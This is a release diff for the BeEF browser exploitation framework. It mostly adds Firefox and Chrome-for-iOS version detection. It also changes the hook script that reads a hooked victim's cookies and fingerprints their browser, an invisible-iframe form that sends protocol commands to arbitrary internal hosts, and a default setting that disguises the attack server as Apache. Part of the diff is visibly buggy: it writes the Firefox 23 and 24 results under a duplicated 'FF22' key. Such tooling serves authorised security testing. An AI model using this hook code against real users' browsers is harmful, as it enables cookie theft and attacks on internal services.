Update version to '0.4.4.6.1-alpha' bug fix edition

Firefox 23 ETA August 2013
Firefox 24 ETA September 2013

Gemfile

@@ -13,7 +13,8 @@ end
 
 gem "eventmachine", "1.0.3"
 gem "thin"
-gem "sinatra", "1.3.2"
+gem "sinatra", "1.4.2"
+gem "rack", "1.5.2"
 gem "em-websocket", "~> 0.3.6"
 gem "jsmin", "~> 1.0.1"
 gem "ansi"

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.4-alpha
+0.4.4.6.1-alpha

beef

@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
     DataMapper.setup(:default,
                      :adapter => config.get("beef.database.driver"),
                      :host => config.get("beef.database.db_host"),
+                     :port => config.get("beef.database.db_port"),
                      :username => config.get("beef.database.db_user"),
                      :password => config.get("beef.database.db_passwd"),
                      :database => config.get("beef.database.db_name"),

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.4-alpha'
+    version: '0.4.4.6.1-alpha'
     debug: false
 
     restrictions:
@@ -27,12 +27,20 @@ beef:
         # if running behind a nat set the public ip address here
         #public: ""
         #public_port: "" # port setting is experimental
-        dns: "localhost"
+        # DNS
+        dns_host: "localhost"
+        dns_port: 53
         panel_path: "/ui/panel"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
 
+        # Allow one or multiple domains to access the RESTful API using CORS
+        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
@@ -43,14 +51,14 @@ beef:
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
-            enable: false
+            enable: true
             type: "apache" #supported: apache, iis
 
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
             # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
             cert: "beef_cert.pem"
 
@@ -72,6 +80,7 @@ beef:
 
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
+        db_port: 5432
         db_name: "beef"
         db_user: "beef"
         db_passwd: "beef123"

core/filters/browser.rb

@@ -22,7 +22,7 @@ module Filters
   def self.is_valid_browsertype?(str)
     return false if not is_non_empty_string?(str)
     return false if str.length < 10
-    return false if str.length > 50
+    return false if str.length > 250
     return false if has_non_printable_char?(str)
     true
   end
@@ -123,9 +123,9 @@ module Filters
     return true if not is_non_empty_string?(str)
     return false if str.length > 1000
     if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
     else
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
     end
   end
 

core/main/client/browser.js

@@ -19,6 +19,22 @@ beef.browser = {
         return navigator.userAgent;
     },
 
+    /**
+     * Returns true if Avant Browser.
+     * @example: beef.browser.isA()
+     */
+    isA:function () {
+        return window.navigator.userAgent.match(/Avant TriCore/) != null;
+    },
+
+    /**
+     * Returns true if Iceweasel.
+     * @example: beef.browser.isI()
+     */
+    isI:function () {
+        return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
+    },
+
     /**
      * Returns true if IE6.
      * @example: beef.browser.isIE6()
@@ -236,12 +252,44 @@ beef.browser = {
 		return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
 	},
 
+    /**
+     * Returns true if FF21
+     * @example: beef.browser.isFF21()
+     */
+    isFF21:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
+    },
+
+    /**
+     * Returns true if FF22
+     * @example: beef.browser.isFF22()
+     */
+    isFF22:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
+    },
+
+    /**
+     * Returns true if FF23
+     * @example: beef.browser.isFF23()
+     */
+    isFF23:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
+    },
+
+    /**
+     * Returns true if FF24
+     * @example: beef.browser.isFF24()
+     */
+    isFF24:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
+    },
+
     /**
      * Returns true if FF.
      * @example: beef.browser.isFF()
      */
     isFF:function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24();
     },
 
     /**
@@ -396,6 +444,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 19.
+     * @example: beef.browser.isC19iOS()
+     */
+    isC19iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 20.
      * @example: beef.browser.isC20()
@@ -404,6 +460,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 20.
+     * @example: beef.browser.isC20iOS()
+     */
+    isC20iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 21.
      * @example: beef.browser.isC21()
@@ -412,6 +476,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 21.
+     * @example: beef.browser.isC21iOS()
+     */
+    isC21iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 22.
      * @example: beef.browser.isC22()
@@ -420,6 +492,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 22.
+     * @example: beef.browser.isC22iOS()
+     */
+    isC22iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 23.
      * @example: beef.browser.isC23()
@@ -428,6 +508,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 23.
+     * @example: beef.browser.isC23iOS()
+     */
+    isC23iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 24.
      * @example: beef.browser.isC24()
@@ -436,6 +524,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 24.
+     * @example: beef.browser.isC24iOS()
+     */
+    isC24iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 25.
      * @example: beef.browser.isC25()
@@ -444,6 +540,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 25.
+     * @example: beef.browser.isC25iOS()
+     */
+    isC25iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 26.
      * @example: beef.browser.isC26()
@@ -452,12 +556,52 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 26.
+     * @example: beef.browser.isC26iOS()
+     */
+    isC26iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 27.
+     * @example: beef.browser.isC27()
+     */
+    isC27:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 27.
+     * @example: beef.browser.isC27iOS()
+     */
+    isC27iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 28.
+     * @example: beef.browser.isC28()
+     */
+    isC28:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 28.
+     * @example: beef.browser.isC28iOS()
+     */
+    isC28iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
+    },
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25() || this.isC26();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS();
     },
 
     /**
@@ -532,13 +676,25 @@ beef.browser = {
             C17:this.isC17(), // Chrome 17
             C18:this.isC18(), // Chrome 18
             C19:this.isC19(), // Chrome 19
+            C19iOS:this.isC19iOS(), // Chrome 19 on iOS
             C20:this.isC20(), // Chrome 20
+            C20iOS:this.isC20iOS(), // Chrome 20 on iOS
             C21:this.isC21(), // Chrome 21
+            C21iOS:this.isC21iOS(), // Chrome 21 on iOS
             C22:this.isC22(), // Chrome 22
+            C22iOS:this.isC22iOS(), // Chrome 22 on iOS
             C23:this.isC23(), // Chrome 23
+            C23iOS:this.isC23iOS(), // Chrome 23 on iOS
             C24:this.isC24(), // Chrome 24
+            C24iOS:this.isC24iOS(), // Chrome 24 on iOS
             C25:this.isC25(), // Chrome 25
+            C25iOS:this.isC25iOS(), // Chrome 25 on iOS
             C26:this.isC26(), // Chrome 26
+            C26iOS:this.isC26iOS(), // Chrome 26 on iOS
+            C27:this.isC27(), // Chrome 27
+            C27iOS:this.isC27iOS(), // Chrome 27 on iOS
+            C28:this.isC28(), // Chrome 28
+            C28iOS:this.isC28iOS(), // Chrome 28 on iOS
             C:this.isC(), // Chrome any version
 
             FF2:this.isFF2(), // Firefox 2
@@ -561,7 +717,11 @@ beef.browser = {
             FF17:this.isFF17(), // Firefox 17
             FF18:this.isFF18(), // Firefox 18
             FF19:this.isFF19(), // Firefox 19
-			FF20:this.isFF20(), // Firefox 20
+            FF20:this.isFF20(), // Firefox 20
+            FF21:this.isFF21(), // Firefox 21
+            FF22:this.isFF22(), // Firefox 22
+            FF22:this.isFF23(), // Firefox 23
+            FF22:this.isFF24(), // Firefox 24
             FF:this.isFF(), // Firefox any version
 
             IE6:this.isIE6(), // Internet Explorer 6
@@ -653,34 +813,82 @@ beef.browser = {
             return '19'
         }
         ;	// Chrome 19
+        if (this.isC19iOS()) {
+            return '19'
+        }
+        ;   // Chrome 19 for iOS
         if (this.isC20()) {
             return '20'
         }
         ;	// Chrome 20
+        if (this.isC20iOS()) {
+            return '20'
+        }
+        ;   // Chrome 20 for iOS
         if (this.isC21()) {
             return '21'
         }
         ;	// Chrome 21
+        if (this.isC21iOS()) {
+            return '21'
+        }
+        ;   // Chrome 21 for iOS
         if (this.isC22()) {
             return '22'
         }
         ;    // Chrome 22
+        if (this.isC22iOS()) {
+            return '22'
+        }
+        ;   // Chrome 22 for iOS
         if (this.isC23()) {
             return '23'
         }
         ;    // Chrome 23
+        if (this.isC23iOS()) {
+            return '23'
+        }
+        ;   // Chrome 23 for iOS
         if (this.isC24()) {
             return '24'
         }
         ;    // Chrome 24
+        if (this.isC24iOS()) {
+            return '24'
+        }
+        ;   // Chrome 24 for iOS
         if (this.isC25()) {
             return '25'
         }
         ;    // Chrome 25
+        if (this.isC25iOS()) {
+            return '25'
+        }
+        ;   // Chrome 25 for iOS
         if (this.isC26()) {
             return '26'
         }
         ;    // Chrome 26
+        if (this.isC26iOS()) {
+            return '26'
+        }
+        ;   // Chrome 26 for iOS
+        if (this.isC27()) {
+            return '27'
+        }
+        ;    // Chrome 27
+        if (this.isC27iOS()) {
+            return '27'
+        }
+        ;   // Chrome 27 for iOS
+        if (this.isC28()) {
+            return '28'
+        }
+        ;    // Chrome 28
+        if (this.isC28iOS()) {
+            return '28'
+        }
+        ;   // Chrome 28 for iOS
         if (this.isFF2()) {
             return '2'
         }
@@ -761,10 +969,26 @@ beef.browser = {
             return '19'
         }
         ;    // Firefox 19
-		if (this.isFF20()) {
-			return '20'
-		}
-		;	// Firefox 20
+        if (this.isFF20()) {
+            return '20'
+        }
+        ;    // Firefox 20
+        if (this.isFF21()) {
+            return '21'
+        }
+        ;    // Firefox 21
+        if (this.isFF22()) {
+            return '22'
+        }
+        ;   // Firefox 22
+        if (this.isFF23()) {
+            return '23'
+        }
+        ;   // Firefox 23
+        if (this.isFF24()) {
+            return '24'
+        }
+        ;   // Firefox 24
 
         if (this.isIE6()) {
             return '6'
@@ -1082,8 +1306,9 @@ beef.browser = {
      */
     hasPhonegap:function () {
         var result = false;
+        
         try {
-            if (!!device.phonegap) result = true; else result = false;
+            if (!!device.phonegap || !!device.cordova) result = true; else result = false;
         }
         catch (e) {
             result = false;
@@ -1449,63 +1674,64 @@ beef.browser = {
     getDetails:function () {
         var details = new Array();
 
-        var browser_name = beef.browser.getBrowserName();
-        var browser_version = beef.browser.getBrowserVersion();
+        var browser_name     = beef.browser.getBrowserName();
+        var browser_version  = beef.browser.getBrowserVersion();
         var browser_reported_name = beef.browser.getBrowserReportedName();
-        var page_title = (document.title) ? document.title : "Unknown";
-        var page_uri = document.location.href;
-        var page_referrer = (document.referrer) ? document.referrer : "Unknown";
-        var hostname = document.location.hostname;
-        var hostport = (document.location.port) ? document.location.port : "80";
-        var browser_plugins = beef.browser.getPlugins();
-        var date_stamp = new Date().toString();
-        var os_name = beef.os.getName();
-        var hw_name = beef.hardware.getName();
-        var cpu_type = beef.hardware.cpuType();
-        var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
+        var page_title       = (document.title) ? document.title : "Unknown";
+        var page_uri         = (document.location.href) ? document.location.href : "Unknown";
+        var page_referrer    = (document.referrer) ? document.referrer : "Unknown";
+        var hostname         = (document.location.hostname) ? document.location.hostname : "Unknown";
+        var hostport         = (document.location.port) ? document.location.port : "80";
+        var browser_plugins  = beef.browser.getPlugins();
+        var date_stamp       = new Date().toString();
+        var os_name          = beef.os.getName();
+        var hw_name          = beef.hardware.getName();
+        var cpu_type         = beef.hardware.cpuType();
+        var touch_enabled    = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
         var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
         var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {
             if (value == true) return value; else if (typeof value == 'object') return value; else return;
         });
-        var screen_size = beef.browser.getScreenSize();
-        var window_size = beef.browser.getWindowSize();
-        var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No";
-        var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
-        var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
-        var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
-        var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
-        var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
-        var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
-        var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
-        var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
-        var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
-        var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No"; 
-        var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
-        var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
+        var screen_size      = beef.browser.getScreenSize();
+        var window_size      = beef.browser.getWindowSize();
+        var java_enabled     = (beef.browser.javaEnabled()) ?     "Yes" : "No";
+        var vbscript_enabled = (beef.browser.hasVBScript()) ?     "Yes" : "No";
+        var has_flash        = (beef.browser.hasFlash()) ?        "Yes" : "No";
+        var has_phonegap     = (beef.browser.hasPhonegap()) ?     "Yes" : "No";
+        var has_googlegears  = (beef.browser.hasGoogleGears()) ?  "Yes" : "No";
+        var has_web_socket   = (beef.browser.hasWebSocket()) ?    "Yes" : "No";
+        var has_webrtc       = (beef.browser.hasWebRTC()) ?       "Yes" : "No";
+        var has_activex      = (beef.browser.hasActiveX()) ?      "Yes" : "No";
+        var has_silverlight  = (beef.browser.hasSilverlight()) ?  "Yes" : "No";
+        var has_quicktime    = (beef.browser.hasQuickTime()) ?    "Yes" : "No";
+        var has_realplayer   = (beef.browser.hasRealPlayer()) ?   "Yes" : "No";
+        var has_wmp          = (beef.browser.hasWMP()) ?          "Yes" : "No"; 
+        var has_vlc          = (beef.browser.hasVLC()) ?          "Yes" : "No";
+        var has_foxit        = (beef.browser.hasFoxit()) ?        "Yes" : "No";
         try{
             var cookies = document.cookie;
             var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
             var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
-            if (cookies) details["Cookies"] = cookies;
-            if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
-            if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
+            if (cookies) details['Cookies'] = cookies;
+            if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
+            if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
         }catch(e){
             // the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
             // and there is no reason to read cookies at this point
-            details["Cookies"] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
-            details["hasSessionCookies"] = "No";
-            details["hasPersistentCookies"] = "No";
+            details['Cookies'] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
+            details['hasSessionCookies'] = "No";
+            details['hasPersistentCookies'] = "No";
         }
 
-        if (browser_name) details["BrowserName"] = browser_name;
-        if (browser_version) details["BrowserVersion"] = browser_version;
-        if (browser_reported_name) details["BrowserReportedName"] = browser_reported_name;
-        if (page_title) details["PageTitle"] = page_title;
-        if (page_uri) details["PageURI"] = page_uri;
-        if (page_referrer) details["PageReferrer"] = page_referrer;
-        if (hostname) details["HostName"] = hostname;
-        if (hostport) details["HostPort"] = hostport;
-        if (browser_plugins) details["BrowserPlugins"] = browser_plugins;
+        if (browser_name) details['BrowserName'] = browser_name;
+        if (browser_version) details['BrowserVersion'] = browser_version;
+        if (browser_reported_name) details['BrowserReportedName'] = browser_reported_name;
+        if (page_title) details['PageTitle'] = page_title;
+        if (page_uri) details['PageURI'] = page_uri;
+        if (page_referrer) details['PageReferrer'] = page_referrer;
+        if (hostname) details['HostName'] = hostname;
+        if (hostport) details['HostPort'] = hostport;
+        if (browser_plugins) details['BrowserPlugins'] = browser_plugins;
         if (os_name) details['OsName'] = os_name;
         if (hw_name) details['Hardware'] = hw_name;
         if (cpu_type) details['CPU'] = cpu_type;
@@ -1516,11 +1742,12 @@ beef.browser = {
         if (screen_size) details['ScreenSize'] = screen_size;
         if (window_size) details['WindowSize'] = window_size;
         if (java_enabled) details['JavaEnabled'] = java_enabled;
-        if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
-        if (has_flash) details['HasFlash'] = has_flash
-        if (has_phonegap) details['HasPhonegap'] = has_phonegap
-        if (has_web_socket) details['HasWebSocket'] = has_web_socket
-        if (has_googlegears) details['HasGoogleGears'] = has_googlegears
+        if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
+        if (has_flash) details['HasFlash'] = has_flash;
+        if (has_phonegap) details['HasPhonegap'] = has_phonegap;
+        if (has_web_socket) details['HasWebSocket'] = has_web_socket;
+        if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
+        if (has_webrtc) details['HasWebRTC'] = has_webrtc;
         if (has_activex) details['HasActiveX'] = has_activex;
         if (has_silverlight) details['HasSilverlight'] = has_silverlight;
         if (has_quicktime) details['HasQuickTime'] = has_quicktime;
@@ -1539,6 +1766,13 @@ beef.browser = {
         return !!window.ActiveXObject;
     },
 
+    /**
+     * Returns boolean value depending on whether the browser supports WebRTC
+     */
+    hasWebRTC:function () {
+        return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection);
+    },
+
     /**
      * Returns boolean value depending on whether the browser supports Silverlight
      */

core/main/client/dom.js

@@ -476,11 +476,11 @@ beef.dom = {
      * @params: {String} rport: remote port
      * @params: {String} commands: protocol commands to be executed by the remote host:port service
      */
-    createIframeIpecForm: function(rhost, rport, commands){
+    createIframeIpecForm: function(rhost, rport, path, commands){
         var iframeIpec = beef.dom.createInvisibleIframe();
 
         var formIpec = document.createElement('form');
-        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+path);
         formIpec.setAttribute('method',  'POST');
         formIpec.setAttribute('enctype', 'multipart/form-data');
 

core/main/constants/hardware.rb

@@ -34,8 +34,8 @@ module Constants
 	HW_HTC_IMG            = 'htc.ico'
 	HW_MOTOROLA_UA_STR    = 'motorola'
 	HW_MOTOROLA_IMG       = 'motorola.png'
-	HW_GOOGLE_UA_STR      = 'Nexus One'
-	HE_GOOGLE_IM          = 'nexus.png'
+	HW_GOOGLE_UA_STR      = 'Nexus'
+	HW_GOOGLE_IMG         = 'nexus.png'
 	HW_ERICSSON_UA_STR    = 'Ericsson'
 	HW_ERICSSON_IMG       = 'sony_ericsson.png'
 	HW_ALL_UA_STR         = 'All'

core/main/handlers/browserdetails.rb

@@ -255,6 +255,14 @@ module BeEF
             self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasWebRTC
+          has_webrtc = get_param(@data['results'], 'HasWebRTC')
+          if BeEF::Filters.is_valid_yes_no?(has_webrtc)
+            BD.set(session_id, 'HasWebRTC', has_webrtc)
+          else
+            self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasActiveX
           has_activex = get_param(@data['results'], 'HasActiveX')
           if BeEF::Filters.is_valid_yes_no?(has_activex)

core/main/models/browserdetails.rb

@@ -80,6 +80,7 @@ module Models
       
       return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
       return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
+      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
       return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
       return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
       return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
       return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
       return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
       return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
-      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
     
       BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
     end

core/main/router/router.rb

@@ -81,16 +81,34 @@ module BeEF
             case type
               when "apache"
                 headers "Server" => "Apache/2.2.3 (CentOS)",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
 
               when "iis"
                 headers "Server" => "Microsoft-IIS/6.0",
                         "X-Powered-By" => "ASP.NET",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
               else
                 print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
             end
           end
+
+          # @note If CORS are enabled, expose the appropriate headers
+          # this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
+          # and be able to handle requests with a JSON content-type
+          if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET",
+                    "Access-Control-Allow-Headers" => "Content-Type"
+            halt 200
+          end
+
+          # @note If CORS are enabled, expose the appropriate headers
+          if config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET"
+          end
         end
 
         # @note Default root page

core/main/server.rb

@@ -41,7 +41,8 @@ module BeEF
